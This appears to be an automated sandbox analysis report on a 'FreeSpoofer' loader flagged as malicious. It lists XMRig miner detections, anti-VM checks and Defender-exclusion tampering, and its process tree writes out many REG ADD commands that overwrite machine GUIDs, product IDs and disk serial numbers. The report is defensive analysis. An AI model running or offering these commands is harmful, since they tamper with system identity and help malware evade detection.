Analysis
-
max time kernel
256s -
max time network
252s -
platform
windows10-ltsc 2021_x64 -
resource
win10ltsc2021-20241211-en -
resource tags
-
submitted
22-12-2024 15:39
General
-
Target
FreeSpoofer/Loader.exe
-
Size
26.4MB
-
MD5
aec49804a232eb45a7cf41e2dfef37fc
-
SHA1
5cedbd522c3c40305f6d656f57edf9b6a89d7e21
-
SHA256
deb7985a8f9a56f2dcbfdd4c5fa4732daad89ce82733818915f3a4e07c2d3b09
-
SHA512
ad9cf94db9a109e0f3a191169025c4f5ec86aca68937c373380dcb84c728b5817bf5e7bee8eea47b7cb82f5415234ab08a53f26030a5573d574477571f3a3d3d
-
SSDEEP
786432:pfjx8ZSLqcnnTNPefii+ydGI5mM3y9nEDQ:pfadJy9nQQ
Score
10/10
Malware Config
Signatures
-
Suspicious use of NtCreateUserProcessOtherParentProcess 12 IoCs
-
Xmrig family
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Looks for VirtualBox Guest Additions in registry 2 TTPs 1 IoCs
-
XMRig Miner payload 6 IoCs
-
Command and Scripting Interpreter: PowerShell 1 TTPs 6 IoCs
Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.
-
Looks for VMWare Tools registry key 2 TTPs 1 IoCs
-
Sets service image path in registry 2 TTPs 2 IoCs
-
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
-
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
-
Executes dropped EXE 8 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
-
Maps connected drives based on registry 3 TTPs 2 IoCs
Disk information is often read in order to detect sandboxing environments.
-
Drops file in System32 directory 3 IoCs
-
Suspicious use of SetThreadContext 2 IoCs
-
Drops file in Program Files directory 3 IoCs
-
Drops file in Windows directory 11 IoCs
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 64 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
-
Enumerates system info in registry 2 TTPs 38 IoCs
-
Modifies data under HKEY_USERS 64 IoCs
-
Suspicious behavior: EnumeratesProcesses 64 IoCs
-
Suspicious behavior: LoadsDriver 2 IoCs
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
-
Suspicious use of SetWindowsHookEx 1 IoCs
-
Suspicious use of WriteProcessMemory 64 IoCs
-
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵
-
C:\Users\Admin\AppData\Local\Temp\FreeSpoofer\Loader.exe"C:\Users\Admin\AppData\Local\Temp\FreeSpoofer\Loader.exe"2⤵
- Looks for VirtualBox Guest Additions in registry
- Looks for VMWare Tools registry key
- Checks BIOS information in registry
- Checks computer location settings
- Maps connected drives based on registry
- Drops file in Windows directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\ProgramData\Microsoft\xJOFQyQVajokVuTmNuWkbEPjfhsqzd.exe"C:\ProgramData\Microsoft\xJOFQyQVajokVuTmNuWkbEPjfhsqzd.exe" C:\ProgramData\GRKkBFtqWWGouHRvxyfYvSWjsufZiG.sys3⤵
- Sets service image path in registry
- Executes dropped EXE
- Suspicious behavior: LoadsDriver
- Suspicious use of AdjustPrivilegeToken
-
-
C:\Users\Admin\AppData\Local\Microsoft\VwjhTKJShUEzNUQUbOmusUFFnvbrGZ.exe"C:\Users\Admin\AppData\Local\Microsoft\VwjhTKJShUEzNUQUbOmusUFFnvbrGZ.exe"3⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\uwkahbv.bat""4⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography" /v MachineGuid /t REG_SZ /d 97eb593b-b8ef-4755-aeeb-a93c03ea578e /f5⤵
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SYSTEM\CurrentControlSet\Control\IDConfigDB\Hardware Profiles\0001" /v HwProfileGuid /t REG_SZ /d 97eb593b-b8ef-4755-aeeb-a93c03ea578e /f5⤵
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion" /v BuildGUID /t REG_SZ /d 97eb593b-b8ef-4755-aeeb-a93c03ea578e /f5⤵
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e967-e325-11ce-bfc1-08002be10318}\Configuration\Variables\BusDeviceDesc" /v PropertyGuid /t REG_SZ /d 97eb593b-b8ef-4755-aeeb-a93c03ea578e /f5⤵
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\Configuration\Variables\DeviceDesc" /v PropertyGuid /t REG_SZ /d 97eb593b-b8ef-4755-aeeb-a93c03ea578e /f5⤵
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Control\Class\{4d36e968-e325-11ce-bfc1-08002be10318}\Configuration\Variables\Driver" /v PropertyGuid /t REG_SZ /d 97eb593b-b8ef-4755-aeeb-a93c03ea578e /f5⤵
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\SystemInformation" /v ComputerHardwareId /t REG_SZ /d 97eb593b-b8ef-4755-aeeb-a93c03ea578e /f5⤵
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\Software\Microsoft\Windows NT\CurrentVersion" /v ProductId /t REG_SZ /d 97eb593b-b8ef-4755-aeeb-a93c03ea578e /f5⤵
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SYSTEM\HardwareConfig" /v LastConfig /t REG_SZ /d 97eb593b-b8ef-4755-aeeb-a93c03ea578e /f5⤵
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\System\CurrentControlSet\Control\WMI\Security" /v 671a8285-4edb-4cae-99fe-69a15c48c0bc /t REG_SZ /d 97eb593b-b8ef-4755-aeeb-a93c03ea578e /f5⤵
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\WindowsUpdate" /v SusClientId /t REG_SZ /d 97eb593b-b8ef-4755-aeeb-a93c03ea578e /f5⤵
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\SOFTWARE\NVIDIA Corporation\Global\CoProcManager" /v ChipsetMatchID /t REG_SZ /d 059F556651A6A866 /f5⤵
-
-
C:\Windows\SysWOW64\reg.exeREG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0"5⤵
- Enumerates system info in registry
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\0" /v Identifier /t REG_SZ /d 1307987-b2d44ef9-A /f5⤵
- Enumerates system info in registry
-
-
C:\Windows\SysWOW64\reg.exeREG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\1"5⤵
- Enumerates system info in registry
-
-
C:\Windows\SysWOW64\reg.exeREG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\2"5⤵
- Enumerates system info in registry
-
-
C:\Windows\SysWOW64\reg.exeREG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\3"5⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
-
-
C:\Windows\SysWOW64\reg.exeREG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\4"5⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
-
-
C:\Windows\SysWOW64\reg.exeREG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\5"5⤵
- Enumerates system info in registry
-
-
C:\Windows\SysWOW64\reg.exeREG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\6"5⤵
- Enumerates system info in registry
-
-
C:\Windows\SysWOW64\reg.exeREG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\7"5⤵
- Enumerates system info in registry
-
-
C:\Windows\SysWOW64\reg.exeREG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\8"5⤵
- Enumerates system info in registry
-
-
C:\Windows\SysWOW64\reg.exeREG QUERY "HKLM\HARDWARE\DESCRIPTION\System\MultifunctionAdapter\0\DiskController\0\DiskPeripheral\9"5⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi" 2>nul5⤵
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi"6⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0" 2>nul5⤵
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0"6⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Port 0\Target Id 0\Logical Unit Id 0" 2>nul5⤵
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Port 0\Target Id 0\Logical Unit Id 0"6⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Interrupt REG_DWORD 0x7\Target Id 0\Logical Unit Id 0" 2>nul5⤵
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Interrupt REG_DWORD 0x7\Target Id 0\Logical Unit Id 0"6⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Dma64BitAddresses REG_DWORD 0x1\Target Id 0\Logical Unit Id 0" 2>nul5⤵
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Dma64BitAddresses REG_DWORD 0x1\Target Id 0\Logical Unit Id 0"6⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Driver REG_SZ storahci\Target Id 0\Logical Unit Id 0" 2>nul5⤵
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Driver REG_SZ storahci\Target Id 0\Logical Unit Id 0"6⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0" 2>nul5⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0"6⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0" /v DeviceType 2>nul5⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0" /v DeviceType6⤵
-
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0" /v SerialNumber /t REG_SZ /d 52E5_615E_721B_8E94_D2F4_444C_95B4_6DB6 /f5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0" /v DeviceType 2>nul5⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0" /v DeviceType6⤵
-
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0" /v SerialNumber /t REG_SZ /d 52E5_615E_721B_8E94_D2F4_444C_95B4_6DB6 /f5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0" /v DeviceType 2>nul5⤵
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0" /v DeviceType6⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0" /v SerialNumber /t REG_SZ /d 52E5_615E_721B_8E94_D2F4_444C_95B4_6DB6 /f5⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0" /v DeviceType 2>nul5⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0" /v DeviceType6⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0" /v SerialNumber /t REG_SZ /d 52E5_615E_721B_8E94_D2F4_444C_95B4_6DB6 /f5⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0" /v DeviceType 2>nul5⤵
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0" /v DeviceType6⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0" /v SerialNumber /t REG_SZ /d 52E5_615E_721B_8E94_D2F4_444C_95B4_6DB6 /f5⤵
- System Location Discovery: System Language Discovery
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0" /v DeviceType 2>nul5⤵
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0" /v DeviceType6⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\reg.exeREG ADD "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 0\Target Id 0\Logical Unit Id 0" /v SerialNumber /t REG_SZ /d 52E5_615E_721B_8E94_D2F4_444C_95B4_6DB6 /f5⤵
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 1\Target Id 0\Logical Unit Id 0" 2>nul5⤵
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 1\Target Id 0\Logical Unit Id 0"6⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 1\Target Id 0\Logical Unit Id 0" /v DeviceType 2>nul5⤵
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 1\Target Id 0\Logical Unit Id 0" /v DeviceType6⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 1\Target Id 0\Logical Unit Id 0" /v DeviceType 2>nul5⤵
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 1\Target Id 0\Logical Unit Id 0" /v DeviceType6⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 1\Target Id 0\Logical Unit Id 0" /v DeviceType 2>nul5⤵
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 1\Target Id 0\Logical Unit Id 0" /v DeviceType6⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 1\Target Id 0\Logical Unit Id 0" /v DeviceType 2>nul5⤵
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 1\Target Id 0\Logical Unit Id 0" /v DeviceType6⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 1\Target Id 0\Logical Unit Id 0" /v DeviceType 2>nul5⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 1\Target Id 0\Logical Unit Id 0" /v DeviceType6⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 2\Target Id 0\Logical Unit Id 0" 2>nul5⤵
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 2\Target Id 0\Logical Unit Id 0"6⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 3\Target Id 0\Logical Unit Id 0" 2>nul5⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 3\Target Id 0\Logical Unit Id 0"6⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 4\Target Id 0\Logical Unit Id 0" 2>nul5⤵
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 4\Target Id 0\Logical Unit Id 0"6⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 5\Target Id 0\Logical Unit Id 0" 2>nul5⤵
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 0\Scsi Bus 5\Target Id 0\Logical Unit Id 0"6⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1" 2>nul5⤵
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1"6⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Port 1\Target Id 0\Logical Unit Id 0" 2>nul5⤵
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Port 1\Target Id 0\Logical Unit Id 0"6⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Interrupt REG_DWORD 0x6\Target Id 0\Logical Unit Id 0" 2>nul5⤵
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Interrupt REG_DWORD 0x6\Target Id 0\Logical Unit Id 0"6⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Dma64BitAddresses REG_DWORD 0x1\Target Id 0\Logical Unit Id 0" 2>nul5⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Dma64BitAddresses REG_DWORD 0x1\Target Id 0\Logical Unit Id 0"6⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Driver REG_SZ storahci\Target Id 0\Logical Unit Id 0" 2>nul5⤵
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Driver REG_SZ storahci\Target Id 0\Logical Unit Id 0"6⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0" 2>nul5⤵
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0"6⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 1\Target Id 0\Logical Unit Id 0" 2>nul5⤵
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 1\Target Id 0\Logical Unit Id 0"6⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 2\Target Id 0\Logical Unit Id 0" 2>nul5⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 2\Target Id 0\Logical Unit Id 0"6⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 3\Target Id 0\Logical Unit Id 0" 2>nul5⤵
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 3\Target Id 0\Logical Unit Id 0"6⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 4\Target Id 0\Logical Unit Id 0" 2>nul5⤵
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 4\Target Id 0\Logical Unit Id 0"6⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 5\Target Id 0\Logical Unit Id 0" 2>nul5⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 5\Target Id 0\Logical Unit Id 0"6⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 2" 2>nul5⤵
- System Location Discovery: System Language Discovery
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 2"6⤵
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Port 2\Target Id 0\Logical Unit Id 0" 2>nul5⤵
-
C:\Windows\SysWOW64\reg.exereg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Port 2\Target Id 0\Logical Unit Id 0"6⤵
- System Location Discovery: System Language Discovery
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c reg query "HKEY_LOCAL_MACHINE\HARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Dma64BitAddresses REG_DWORD 0x1\Target Id 0\Logical Unit Id 0" 2>nul5⤵
-
